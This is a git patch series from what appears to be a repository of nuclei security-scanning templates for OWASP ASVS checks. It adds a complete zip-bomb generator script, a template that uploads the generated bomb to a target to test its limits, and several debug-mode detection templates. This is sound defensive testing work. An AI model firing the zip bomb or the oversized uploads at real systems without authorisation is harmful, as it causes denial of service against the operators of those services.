application will not accept large files that could fill up storage or cause a denial of service. + + +variables: + large_file_size: 10000000 + small_file_size: 100 + file_type: "text/plain" + file_ext: "txt" + +http: + - raw: + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiugABg7zoMAxIKId + + ------WebKitFormBoundaryiugABg7zoMAxIKId + Content-Disposition: form-data; name="file"; filename="{{randstr}}.{{file_ext}}" + Content-Type: {{file_type}} + + {{rand_text_alpha({{small_file_size}})}} + ------WebKitFormBoundaryiugABg7zoMAxIKId-- + + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiugABg7zoMAxIKId + + ------WebKitFormBoundaryiugABg7zoMAxIKId + Content-Disposition: form-data; name="file"; filename="{{randstr}}.{{file_ext}}" + Content-Type: {{file_type}} + + {{rand_text_alpha({{large_file_size}})}} + ------WebKitFormBoundaryiugABg7zoMAxIKId-- + + extractors: + - type: dsl + name: status code of large file upload. + dsl: + - status_code_2 + + matchers: + - type: dsl + name: status_code + condition: and + dsl: + - status_code_2 < 210 && status_code_2 >= 200 + - status_code_2 == status_code \ No newline at end of file diff --git a/templates/code/12.1.1.2.yaml b/templates/code/12.1.1.2.yaml new file mode 100644 index 0000000..98fa6a8 --- /dev/null +++ b/templates/code/12.1.1.2.yaml @@ -0,0 +1,59 @@ +id: ASVS-4-0-3-V12-1-1-2 + +info: + name: ASVS 12.1.1.2 (Zipbomb) Check + author: Hamed Salimian + severity: medium + classification: + cwe-id: CWE-400 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods + - https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html + - https://github.com/ZerosunGitHub/zipbomb + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_1_1/index.html + tags: asvs,12.1.1 + description: | + Verify that the application will not accept large files that could fill up storage or cause a denial of service. + +variables: + mode: "quoted_overlap" + num-files: 250 + compressed-size: 21179 + +code: + - engine: + - py + - python + - python3 + source: | + import subprocess + import sys + import os + + mode = os.getenv('mode') + num_files = os.getenv('num-files') + compressed_size = os.getenv('compressed-size') + subprocess.run([sys.executable, "code/source/zipbomb.py", f"--mode={mode}", f"--num-files={num_files}", f"--compressed-size={compressed_size}"]) + +http: + - raw: + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiugABg7zoMAxIKId + + ------WebKitFormBoundaryiugABg7zoMAxIKId + Content-Disposition: form-data; name="file"; filename="zipbomb.zip" + Content-Type: application/zip + + {{code_response}} + ------WebKitFormBoundaryiugABg7zoMAxIKId-- + + matchers: + - type: status + name: status_code + status: + - 500 + - 503 +# digest: 4b0a00483046022100c965e8aa990ee25114f7e6ee8d12409719404e286ff49c879f842302a18eda14022100a35665298c4e11bdca2517f18b667064a19dfa3657a292f5fd58fb92a594b1b9:99354b7c2d97285abe7401b783fba350 \ No newline at end of file diff --git a/templates/code/source/zipbomb.py b/templates/code/source/zipbomb.py new file mode 100644 index 0000000..70a3525 --- /dev/null +++ b/templates/code/source/zipbomb.py @@ -0,0 +1,768 @@ +#!/usr/bin/env python3 + +import binascii +import bz2 +import getopt +import math +import struct +import sys +import zipfile + + +CHOSEN_BYTE = ord(b"a") # homage to 42.zip + + +# CRC-32 precomputation using matrices in GF(2). Similar to crc32_combine in +# zlib. See https://stackoverflow.com/a/23126768 for a description of the idea. +# Here, we use a 33-bit state where the dummy 33rd coordinate is always 1 +# (similar to homogeneous coordinates). Matrices are represented as 33-element +# lists, where each element is a 33-bit integer representing one column. + +CRC_POLY = 0xedb88320 + +def matrix_mul_vector(m, v): + r = 0 + for shift in range(len(m)): + if (v>>shift) & 1 == 1: + r ^= m[shift] + return r + +def matrix_mul(a, b): + assert len(a) == len(b) + return [matrix_mul_vector(a, v) for v in b] + +def identity_matrix(): + return [1<>shift)&1], m) + return m + +def precompute_crc_matrix_repeated(data, n): + accum = precompute_crc_matrix(data) + # Square-and-multiply algorithm to compute m = accum^n. + m = identity_matrix() + while n > 0: + if n & 1 == 1: + m = matrix_mul(m, accum) + accum = matrix_mul(accum, accum) + n >>= 1 + return m + +def crc_matrix_apply(m, value=0): + return (matrix_mul_vector(m, (value^0xffffffff)|(1<<32)) & 0xffffffff) ^ 0xffffffff + + +# DEFLATE stuff, see RFC 1951. + +class BitBuffer: + def __init__(self): + self.done = [] + self.current = 0 + self.bit_pos = 0 + + def push(self, x, n): + assert x == x % (1<= (8 - self.bit_pos): + self.current |= (x << self.bit_pos) & 0xff + x >>= (8 - self.bit_pos) + n -= (8 - self.bit_pos) + self.done.append(self.current) + self.current = 0 + self.bit_pos = 0 + self.current |= (x << self.bit_pos) & 0xff + self.bit_pos += n + + def push_rev(self, x, n): + mask = (1<>1 + while mask > 0: + self.push(x&mask != 0 and 1 or 0, 1) + mask >>= 1 + + def bytes(self): + out = bytes(self.done) + if self.bit_pos != 0: + out += bytes([self.current]) + return out + +# RFC 1951 section 3.2.2. Input is a sym: length dict and output is a +# sym: (code, length) dict. +def huffman_codes_from_lengths(sym_lengths): + bl_count = {} + max_length = 0 + for _, length in sym_lengths.items(): + bl_count.setdefault(length, 0) + bl_count[length] += 1 + max_length = max(max_length, length) + + next_code = {} + code = 0 + for length in range(max_length): + code = (code + bl_count.get(length, 0)) << 1 + next_code[length+1] = code + + result = {} + for sym, length in sorted(sym_lengths.items(), key=lambda x: (x[1], x[0])): + assert next_code[length] >> length == 0, (sym, bin(next_code[length]), length) + result[sym] = next_code[length], length + next_code[length] += 1 + return result + +def print_huffman_codes(sym_codes, **kwargs): + max_sym_length = max(len("{}".format(sym)) for sym in sym_codes) + for sym, code in sorted(sym_codes.items()): + code, length = code + print("{:{}}: {:0{}b}".format(sym, max_sym_length, code, length), **kwargs) + +# RFC 1951 section 3.2.5. Returns a tuple (code, extra_bits, num_extra_bits). +def code_for_length(length): + if length < 3: + return None, None, None + elif length < 11: + base_code, base_length, num_bits = 257, 3, 0 + elif length < 19: + base_code, base_length, num_bits = 265, 11, 1 + elif length < 35: + base_code, base_length, num_bits = 269, 19, 2 + elif length < 67: + base_code, base_length, num_bits = 273, 35, 3 + elif length < 131: + base_code, base_length, num_bits = 277, 67, 4 + elif length < 258: + base_code, base_length, num_bits = 281, 131, 5 + else: + raise ValueError(length) + return base_code + ((length - base_length) >> num_bits), (length - base_length) & ((1<= 11: + if n < 138: + x = n + elif n < 138 + 11 and code_length_lengths[18] < (n - 138) * code_length_lengths[0]: + # It'll be cheaper to cut this 18 block short and do the + # remainder with another full 18 block. + x = n - 11 + else: + x = 138 + bits.push_rev(*code_length_codes[18]) # 7 bits of length to follow + bits.push(x - 11, 7) + n -= x + while n > 0: + bits.push_rev(*code_length_codes[0]) + n -= 1 + # Output a Huffman tree in terms of code lengths. + def output_code_length_tree(sym_lengths): + cur = 0 + for sym, length in sorted(sym_lengths.items()): + skip(sym - cur) + bits.push_rev(*code_length_codes[length]) + cur = sym + 1 + + # Output Huffman tree for literal/length values. + output_code_length_tree(ll_lengths) + + # Output Huffman tree for distance codes. + output_code_length_tree(distance_lengths) + + n = 0 + # A literal byte to start the whole process. + bits.push_rev(*ll_codes[repeated_byte]) + n += 1 + + # Now every pair of 0 bits encodes 258 copies of repeated_byte. + is_even = bits.bit_pos % 2 == 0 + # Including whatever zero bits remain at the end of the bit buffer. + n += (8 - bits.bit_pos + 1) // 2 * 258 + + prefix = bits.bytes() + + bits = BitBuffer() + if not is_even: + bits.push(*distance_codes[0]) + if max_uncompressed_size is not None: + # Push bytes to get within 258 of the max we are allowed. + while (max_uncompressed_size - n) % 1032 >= 258: + bits.push_rev(*ll_codes[285]) + bits.push(*distance_codes[0]) + n += 258 + else: + # Push the stream-end code (256) as far back in the byte as possible. + while bits.bit_pos + ll_lengths[285] + distance_lengths[0] + ll_lengths[256] <= 8: + bits.push_rev(*ll_codes[285]) + bits.push(*distance_codes[0]) + n += 258 + bits.push_rev(*ll_codes[256]) + suffix = bits.bytes() + + if max_uncompressed_size is not None: + num_zeroes = (max_uncompressed_size - n) // 1032 + else: + num_zeroes = compressed_size - len(prefix) - len(suffix) + + n += num_zeroes * 1032 + body = b"\x00" * num_zeroes + + compressed_data = prefix + body + suffix + + if max_uncompressed_size is not None: + assert (max_uncompressed_size - n) < 258, (n, max_uncompressed_size) + else: + assert len(compressed_data) == compressed_size, (len(compressed_data), compressed_size) + + return compressed_data, n, precompute_crc_matrix_repeated(bytes([repeated_byte]), n) + + +# bzip2 stuff + +def bulk_bzip2(repeated_byte, compressed_size=None, max_uncompressed_size=None): + assert (compressed_size is None and max_uncompressed_size is not None) or (compressed_size is not None and max_uncompressed_size is None) + + # 45899235, empirically determined to be the largest amount of data that + # fits into a 900 kB block after the initial bzip2 RLE (each 255 bytes + # becomes 5 bytes; 45899235 * 5 / 255 = 899985). + # https://en.wikipedia.org/w/index.php?title=Bzip2&oldid=890453143#File_format + # says it can fit 45899236, 1 byte more, but in my tests that results in a + # second block being emitted. + block_uncompressed_size = 45899235 + + # Use an actual bzip2 implementation to compress the entire stream, then + # extract from it a single block that we will repeat. This is actually + # bogus, because whatever follows the block header is not necessarily + # byte-aligned, but the assertions will prevent going ahead if things don't + # work out perfectly. + basic = bz2.compress(bytes([repeated_byte])*block_uncompressed_size, 9) + assert len(basic) == 46, basic + header, block, footer, _ = basic[0:4], basic[4:36], basic[36:42], basic[42:] + assert header == b"BZh9", header + assert block.startswith(b"\x31\x41\x59\x26\x53\x59"), block + assert footer == b"\x17\x72\x45\x38\x50\x90", header + block_crc, = struct.unpack(">L", block[6:10]) + + if compressed_size is not None: + num_blocks = (compressed_size - 4 - 10) // 32 + assert (compressed_size - 4 - 10) % 32 == 0 + else: + num_blocks = max_uncompressed_size // block_uncompressed_size + n = num_blocks * block_uncompressed_size + # 2.2.4 https://github.com/dsnet/compress/blob/master/doc/bzip2-format.pdf + stream_crc = 0 + for i in range(num_blocks): + stream_crc = (block_crc ^ ((stream_crc<<1) | (stream_crc>>31))) & 0xffffffff + + crc_matrix = precompute_crc_matrix_repeated(bytes([repeated_byte]), n) + compressed_data = header + block*num_blocks + footer + struct.pack(">L", stream_crc) + return compressed_data, n, crc_matrix + + +# APPNOTE.TXT 4.4.5 +# 8 - The file is Deflated +COMPRESSION_METHOD_DEFLATE = 8 +# 12 - File is compressed using BZIP2 algorithm +COMPRESSION_METHOD_BZIP2 = 12 + +BULK_COMPRESS = { + COMPRESSION_METHOD_BZIP2: bulk_bzip2, + COMPRESSION_METHOD_DEFLATE: bulk_deflate, +} + +# APPNOTE.TXT 4.4.3.2 +# 2.0 - File is compressed using Deflate compression +ZIP_VERSION = 20 +# 4.5 - File uses ZIP64 format extensions +ZIP64_VERSION = 45 +# 4.6 - File is compressed using BZIP2 compression +ZIP_BZIP2_VERSION = 46 + +MOD_DATE = 0x0548 +MOD_TIME = 0x6ca0 + +def zip_version(compression_method=COMPRESSION_METHOD_DEFLATE, zip64=False): + candidates = [ZIP_VERSION] + if compression_method==COMPRESSION_METHOD_BZIP2: + candidates.append(ZIP_BZIP2_VERSION) + if zip64: + candidates.append(ZIP64_VERSION) + return max(candidates) + +# In Zip64 mode, we add a Zip64 extra field for every file (including using +# ZIP64_VERSION instead of ZIP_VERSION) for *every* file, whether it is large +# enough to need it or not. Past a certain threshold, every file *does* need it +# anyway. It may be slightly better for compatibility to write every file in +# either Zip64 or non-Zip64 mode. See the block comment in putextended in +# zipfile.c of Info-ZIP Zip 3.0 (though the worst incompatibility has to do with +# data descriptors, which we don't use). +# +# Even in Zip64 mode, we make the assumption that the only field that needs to +# be represented in the Zip64 extra info is uncompressed_size, and not +# compressed_size nor local_file_header_offset (checked with an assertion in +# CentralDirectoryHeader.serialize). This is to make analysis easier (central +# directory headers and local file headers continue to have a fixed size), and +# because the zip file has to be really big for either of those fields to exceed +# 4 GiB—the quoted_overlap method can produce a zip file whose total unzipped +# size is greater than 16 EiB (2^64 bytes) without exceeding either of those +# limits. + +class LocalFileHeader: + def __init__(self, compressed_size, uncompressed_size, crc, filename, compression_method=COMPRESSION_METHOD_DEFLATE, extra_tag=None, extra_length_excess=0): + self.compressed_size = compressed_size + self.uncompressed_size = uncompressed_size + self.crc = crc + self.filename = filename + self.compression_method = compression_method + self.extra_tag = extra_tag + self.extra_length_excess = extra_length_excess + + def serialize(self, zip64=False): + # APPNOTE.TXT 4.5.3 says that in the local file header, unlike the + # central directory header, we must include both uncompressed_size and + # compressed_size in the Zip64 extra field, even if one of them is not + # so big as to require Zip64. + extra = b"" + if zip64: + extra += struct.pack(" 0: + extra += struct.pack(" bomb.zip + {program_name} --num-files=N --max-uncompressed-size=N [OPTIONS...] > bomb.zip + +The --num-files option and either the --compressed-size or +--max-uncompressed-size options are required. + + --algorithm=ALG ALG can be "deflate" (default) or "bzip2" + --alphabet=CHARS alphabet for constructing filenames + --compressed-size=N compressed size of the kernel + --extra=HHHH use extra-field quoting with the type tag 0xHHHH + --max-uncompressed-size=N maximum uncompressed size of the kernel + --mode=MODE "no_overlap", "full_overlap", or "quoted_overlap" (default) + --num-files=N number of files to contain, not counting template files + --template=ZIP zip file containing other files to store in the zip bomb + --zip64 enable Zip64 extensions\ +""".format(program_name=sys.argv[0]), file=file) + +def main(): + opts, args = getopt.gnu_getopt(sys.argv[1:], "h", ["algorithm=", "alphabet=", "compressed-size=", "extra=", "help", "max-uncompressed-size=", "mode=", "num-files=", "template=", "zip64"]) + assert not args, args + global FILENAME_ALPHABET + mode = write_zip_quoted_overlap + compression_method = COMPRESSION_METHOD_DEFLATE + compressed_size = None + max_uncompressed_size = None + extra_tag = None + template_filenames = [] + zip64 = False + for o, a in opts: + if o == "--algorithm": + compression_method = { + "bzip2": COMPRESSION_METHOD_BZIP2, + "deflate": COMPRESSION_METHOD_DEFLATE, + }[a] + elif o == "--alphabet": + assert len(set(sorted(a))) == len(a), a + FILENAME_ALPHABET = bytes(a, "utf-8") + elif o == "--compressed-size": + compressed_size = int(a) + elif o == "--extra": + # This is an experimental feature that quotes as many files as + # possible inside the Extra Field of local file headers, rather than + # quoting using DEFLATE non-compressed blocks. The argument is a + # 16-bit hexadecimal tag ID. It should be possible to use any tag ID + # that's unallocated in APPNOTE.TXT 4.5.2. + extra_tag = int(a, 16) + elif o == "--max-uncompressed-size": + max_uncompressed_size = int(a) + elif o == "--mode": + mode = { + "no_overlap": write_zip_no_overlap, + "full_overlap": write_zip_full_overlap, + "quoted_overlap": write_zip_quoted_overlap, + }[a] + elif o == "--num-files": + num_files = int(a) + elif o == "--template": + template_filenames.append(a) + elif o == "--zip64": + zip64 = True + elif o in ("-h", "--help"): + usage() + sys.exit(1) + + if extra_tag is not None and mode != write_zip_quoted_overlap: + print("--extra only makes sense with --mode=quoted_overlap", file=sys.stderr) + sys.exit(1) + + template = [] + for filename in template_filenames: + template.extend(load_template(filename)) + + mode(sys.stdout.buffer, num_files, compressed_size=compressed_size, max_uncompressed_size=max_uncompressed_size, compression_method=compression_method, zip64=zip64, template=template, extra_tag=extra_tag) + +if __name__ == "__main__": + main() From 3d6ab7dbfb11c5a47610dfc5256bc7ce13f42065 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 23 Mar 2024 12:46:50 +0000 Subject: [PATCH 082/129] Create 12.1.1.(2).yaml --- templates/12.1.1.yaml | 2 +- templates/code/12.1.1.2.yaml | 6 +++--- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/templates/12.1.1.yaml b/templates/12.1.1.yaml index fc2fe45..3470077 100644 --- a/templates/12.1.1.yaml +++ b/templates/12.1.1.yaml @@ -23,7 +23,7 @@ variables: http: - raw: - - | + - | POST {{BaseURL}} HTTP/1.1 Host: {{Hostname}} Accept: */* diff --git a/templates/code/12.1.1.2.yaml b/templates/code/12.1.1.2.yaml index 98fa6a8..62b4987 100644 --- a/templates/code/12.1.1.2.yaml +++ b/templates/code/12.1.1.2.yaml @@ -34,10 +34,10 @@ code: num_files = os.getenv('num-files') compressed_size = os.getenv('compressed-size') subprocess.run([sys.executable, "code/source/zipbomb.py", f"--mode={mode}", f"--num-files={num_files}", f"--compressed-size={compressed_size}"]) - + http: - raw: - - | + - | POST {{BaseURL}} HTTP/1.1 Host: {{Hostname}} Accept: */* @@ -56,4 +56,4 @@ http: status: - 500 - 503 -# digest: 4b0a00483046022100c965e8aa990ee25114f7e6ee8d12409719404e286ff49c879f842302a18eda14022100a35665298c4e11bdca2517f18b667064a19dfa3657a292f5fd58fb92a594b1b9:99354b7c2d97285abe7401b783fba350 \ No newline at end of file +# digest: 490a0046304402203b8787953e9fa8a0e551fc309787addc534c07c2b32f3665f6b307fb8e4cc28802206af2bc67ad42c54ee002eb47b45765e2417ac7bc1ee88414ac0c5c8352bacec1:99354b7c2d97285abe7401b783fba350 \ No newline at end of file From e25ad20a3a855008e950bddec231960bf7eca82f Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 23 Mar 2024 16:38:37 +0330 Subject: [PATCH 083/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 213dda0..ad36a52 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -25,6 +25,7 @@ jobs: - name: Template Validation run: | + nuclei -ut cp -r ${{ github.workspace }}/templates /home/runner/nuclei-templates nuclei -duc -validate -allow-local-file-access nuclei -duc -validate -allow-local-file-access -w /home/runner/nuclei-templates/workflows From b99579d63e858c42d654d63a09ba43da80a0b9b4 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 23 Mar 2024 13:15:03 +0000 Subject: [PATCH 084/129] fix template validation action --- .github/workflows/template-validate.yml | 1 - templates/12.1.1.yaml | 2 +- 2 files changed, 1 insertion(+), 2 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index ad36a52..213dda0 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -25,7 +25,6 @@ jobs: - name: Template Validation run: | - nuclei -ut cp -r ${{ github.workspace }}/templates /home/runner/nuclei-templates nuclei -duc -validate -allow-local-file-access nuclei -duc -validate -allow-local-file-access -w /home/runner/nuclei-templates/workflows diff --git a/templates/12.1.1.yaml b/templates/12.1.1.yaml index 3470077..60d8604 100644 --- a/templates/12.1.1.yaml +++ b/templates/12.1.1.yaml @@ -36,7 +36,7 @@ http: {{rand_text_alpha({{small_file_size}})}} ------WebKitFormBoundaryiugABg7zoMAxIKId-- - - | + - | POST {{BaseURL}} HTTP/1.1 Host: {{Hostname}} Accept: */* From a38dc86cf905b61fd8d8fb44ec670e74626cb7ff Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 23 Mar 2024 13:41:26 +0000 Subject: [PATCH 085/129] Add workflow templates --- templates/workflows/14.3.2.yaml | 50 ++++++++--------- .../exposures/logs/jboss-seam-debug-page.yaml | 30 +++++++++++ .../exposures/logs/rails-debug-mode.yaml | 24 +++++++++ .../airflow/airflow-debug.yaml | 31 +++++++++++ .../misconfiguration/aspx-debug-mode.yaml | 38 +++++++++++++ .../browserless-debugger.yaml | 33 ++++++++++++ .../misconfiguration/debug/ampache-debug.yaml | 34 ++++++++++++ .../misconfiguration/debug/bottle-debug.yaml | 36 +++++++++++++ .../misconfiguration/django-debug-detect.yaml | 29 ++++++++++ .../laravel-debug-enabled.yaml | 31 +++++++++++ .../misconfiguration/laravel-debug-error.yaml | 26 +++++++++ .../laravel-debug-infoleak.yaml | 53 +++++++++++++++++++ .../logs/django-debug-exposure.yaml | 33 ++++++++++++ .../logs/struts-debug-mode.yaml | 23 ++++++++ .../logs/struts-problem-report.yaml | 29 ++++++++++ .../php-debugbar-exposure.yaml | 34 ++++++++++++ .../misconfiguration/php-errors.yaml | 47 ++++++++++++++++ .../rekognition-image-validation.yaml | 35 ++++++++++++ .../misconfiguration/sitecore-debug-page.yaml | 27 ++++++++++ .../misconfiguration/struts-ognl-console.yaml | 34 ++++++++++++ .../misconfiguration/symfony-debug.yaml | 41 ++++++++++++++ .../misconfiguration/typo3-debug-mode.yaml | 31 +++++++++++ .../misconfiguration/wamp-xdebug-detect.yaml | 29 ++++++++++ .../werkzeug-debugger-detect.yaml | 22 ++++++++ .../jenkins/jenkins-stack-trace.yaml | 32 +++++++++++ 25 files changed, 807 insertions(+), 25 deletions(-) create mode 100644 templates/workflows/exposures/logs/jboss-seam-debug-page.yaml create mode 100644 templates/workflows/exposures/logs/rails-debug-mode.yaml create mode 100644 templates/workflows/misconfiguration/airflow/airflow-debug.yaml create mode 100644 templates/workflows/misconfiguration/aspx-debug-mode.yaml create mode 100644 templates/workflows/misconfiguration/browserless-debugger.yaml create mode 100644 templates/workflows/misconfiguration/debug/ampache-debug.yaml create mode 100644 templates/workflows/misconfiguration/debug/bottle-debug.yaml create mode 100644 templates/workflows/misconfiguration/django-debug-detect.yaml create mode 100644 templates/workflows/misconfiguration/laravel-debug-enabled.yaml create mode 100644 templates/workflows/misconfiguration/laravel-debug-error.yaml create mode 100644 templates/workflows/misconfiguration/laravel-debug-infoleak.yaml create mode 100644 templates/workflows/misconfiguration/logs/django-debug-exposure.yaml create mode 100644 templates/workflows/misconfiguration/logs/struts-debug-mode.yaml create mode 100644 templates/workflows/misconfiguration/logs/struts-problem-report.yaml create mode 100644 templates/workflows/misconfiguration/php-debugbar-exposure.yaml create mode 100644 templates/workflows/misconfiguration/php-errors.yaml create mode 100644 templates/workflows/misconfiguration/rekognition-image-validation.yaml create mode 100644 templates/workflows/misconfiguration/sitecore-debug-page.yaml create mode 100644 templates/workflows/misconfiguration/struts-ognl-console.yaml create mode 100644 templates/workflows/misconfiguration/symfony-debug.yaml create mode 100644 templates/workflows/misconfiguration/typo3-debug-mode.yaml create mode 100644 templates/workflows/misconfiguration/wamp-xdebug-detect.yaml create mode 100644 templates/workflows/technologies/werkzeug-debugger-detect.yaml create mode 100644 templates/workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml diff --git a/templates/workflows/14.3.2.yaml b/templates/workflows/14.3.2.yaml index ce7ab3e..3967c7f 100644 --- a/templates/workflows/14.3.2.yaml +++ b/templates/workflows/14.3.2.yaml @@ -13,28 +13,28 @@ info: Verify that web or application server and application framework debug modes are disabled in production to eliminate debug features, developer consoles, and unintended security disclosures. workflows: - - template: misconfiguration/symfony-debug.yaml - - template: exposures/logs/rails-debug-mode.yaml - - template: misconfiguration/debug/bottle-debug.yaml - - template: misconfiguration/debug/ampache-debug.yaml - - template: misconfiguration/laravel-debug-enabled.yaml - - template: misconfiguration/laravel-debug-infoleak.yaml - - template: misconfiguration/laravel-debug-error.yaml - - template: misconfiguration/aspx-debug-mode.yaml - - template: exposures/logs/jboss-seam-debug-page.yaml - - template: misconfiguration/struts-ognl-console.yaml - - template: exposures/logs/struts-problem-report.yaml - - template: misconfiguration/sitecore-debug-page.yaml - - template: exposures/logs/django-debug-exposure.yaml - - template: misconfiguration/rekognition-image-validation.yaml - - template: misconfiguration/browserless-debugger.yaml - - template: exposures/logs/struts-debug-mode.yaml - - template: misconfiguration/django-debug-detect.yaml - - template: misconfiguration/airflow/airflow-debug.yaml - - template: misconfiguration/php-debugbar-exposure.yaml - - template: misconfiguration/wamp-xdebug-detect.yaml - - template: misconfiguration/typo3-debug-mode.yaml - - template: exposures/logs/pyramid-debug-toolbar.yaml - - template: misconfiguration/php-errors.yaml - - template: vulnerabilities/jenkins/jenkins-stack-trace.yaml - - template: technologies/werkzeug-debugger-detect.yaml \ No newline at end of file + - template: workflows/misconfiguration/symfony-debug.yaml + - template: workflows/exposures/logs/rails-debug-mode.yaml + - template: workflows/misconfiguration/debug/bottle-debug.yaml + - template: workflows/misconfiguration/debug/ampache-debug.yaml + - template: workflows/misconfiguration/laravel-debug-enabled.yaml + - template: workflows/misconfiguration/laravel-debug-infoleak.yaml + - template: workflows/misconfiguration/laravel-debug-error.yaml + - template: workflows/misconfiguration/aspx-debug-mode.yaml + - template: workflows/exposures/logs/jboss-seam-debug-page.yaml + - template: workflows/misconfiguration/struts-ognl-console.yaml + - template: workflows/exposures/logs/struts-problem-report.yaml + - template: workflows/misconfiguration/sitecore-debug-page.yaml + - template: workflows/exposures/logs/django-debug-exposure.yaml + - template: workflows/misconfiguration/rekognition-image-validation.yaml + - template: workflows/misconfiguration/browserless-debugger.yaml + - template: workflows/exposures/logs/struts-debug-mode.yaml + - template: workflows/misconfiguration/django-debug-detect.yaml + - template: workflows/misconfiguration/airflow/airflow-debug.yaml + - template: workflows/misconfiguration/php-debugbar-exposure.yaml + - template: workflows/misconfiguration/wamp-xdebug-detect.yaml + - template: workflows/misconfiguration/typo3-debug-mode.yaml + - template: workflows/exposures/logs/pyramid-debug-toolbar.yaml + - template: workflows/misconfiguration/php-errors.yaml + - template: workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml + - template: workflows/technologies/werkzeug-debugger-detect.yaml \ No newline at end of file diff --git a/templates/workflows/exposures/logs/jboss-seam-debug-page.yaml b/templates/workflows/exposures/logs/jboss-seam-debug-page.yaml new file mode 100644 index 0000000..261c65f --- /dev/null +++ b/templates/workflows/exposures/logs/jboss-seam-debug-page.yaml @@ -0,0 +1,30 @@ +id: jboss-seam-debug-page + +info: + name: Jboss Seam Debug Page Enabled + author: dhiyaneshDK + severity: medium + description: Jboss Seam Debug Page was exposed. + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jboss-seam-debug-page.yaml + metadata: + max-request: 1 + tags: jboss,logs,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/debug.seam" + + matchers-condition: and + matchers: + - type: word + words: + - "SeamDebugPage" + - "org.jboss.seam" + condition: and + + - type: status + status: + - 200 +# digest: 4b0a00483046022100e8411b45c22ca433e5f3bd5fe956f5b345fc7057cfd50ba2e94466da76bccc48022100d548feaa4f8967210c5093ab640433f3dcbc610e1afe2e12b9bf2232fa240129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/exposures/logs/rails-debug-mode.yaml b/templates/workflows/exposures/logs/rails-debug-mode.yaml new file mode 100644 index 0000000..7b30e36 --- /dev/null +++ b/templates/workflows/exposures/logs/rails-debug-mode.yaml @@ -0,0 +1,24 @@ +id: rails-debug-mode + +info: + name: Rails Debug Mode + author: pdteam + severity: medium + description: Rails debug mode is enabled. + metadata: + max-request: 1 + tags: debug,rails,exposure,intrusive + +http: + - method: GET + path: + - "{{BaseURL}}/{{randstr}}" + + matchers: + - type: word + part: body + words: + - "Rails.root:" + - "Action Controller: Exception caught" + condition: and +# digest: 4a0a00473045022032b4ac1b752bc49bad211b086747a6b513069249d0119c514d0c5bb4273ce0f3022100bb3cffbab5dc40220beeb5c9a33a8b54794e5ab5086e8ec6aacbe479ec7c94a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/airflow/airflow-debug.yaml b/templates/workflows/misconfiguration/airflow/airflow-debug.yaml new file mode 100644 index 0000000..8742106 --- /dev/null +++ b/templates/workflows/misconfiguration/airflow/airflow-debug.yaml @@ -0,0 +1,31 @@ +id: airflow-debug + +info: + name: Airflow Debug Trace + author: pdteam + severity: low + description: Airflow Debug Trace enabled. + metadata: + verified: true + max-request: 1 + shodan-query: title:"Airflow - DAGs" + tags: apache,airflow,fpd,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

Ooops.

" + - "Traceback (most recent call last)" + condition: and + + - type: status + status: + - 500 +# digest: 4a0a00473045022100b07309b0cbd96d505399c9c82239f762478a3023c1e8556e3e6d773d6afd1416022012c8681190e9080dab6e8fb7278dd01ea443ade8c3845cd3550bda5352584ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/aspx-debug-mode.yaml b/templates/workflows/misconfiguration/aspx-debug-mode.yaml new file mode 100644 index 0000000..4dd64d7 --- /dev/null +++ b/templates/workflows/misconfiguration/aspx-debug-mode.yaml @@ -0,0 +1,38 @@ +id: aspx-debug-mode + +info: + name: ASP.NET Debugging Enabled + author: dhiyaneshDk + severity: info + reference: + - https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled + metadata: + max-request: 1 + tags: debug,misconfig + +http: + - raw: + - | + DEBUG /Foobar-debug.aspx HTTP/1.1 + Host: {{Hostname}} + Command: stop-debug + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Content-Length: 2 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'OK' + part: body + + - type: word + words: + - 'Content-Length: 2' + part: header + +# digest: 4a0a00473045022100e7a32aaa7cff08a4dddee13a653b02f87f89517cf5265e21898c31c6f96f25a90220098bf55aeaca69565900838b0a9ea62c3669bf923e3d1a0ec98c7e6db27b77de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/browserless-debugger.yaml b/templates/workflows/misconfiguration/browserless-debugger.yaml new file mode 100644 index 0000000..f3ab2b6 --- /dev/null +++ b/templates/workflows/misconfiguration/browserless-debugger.yaml @@ -0,0 +1,33 @@ +id: browserless-debugger + +info: + name: Exposed Browserless debugger + author: ggranjus + severity: medium + description: Browserless instance can be used to make web requests. May worth checking /workspace for juicy files. + reference: + - 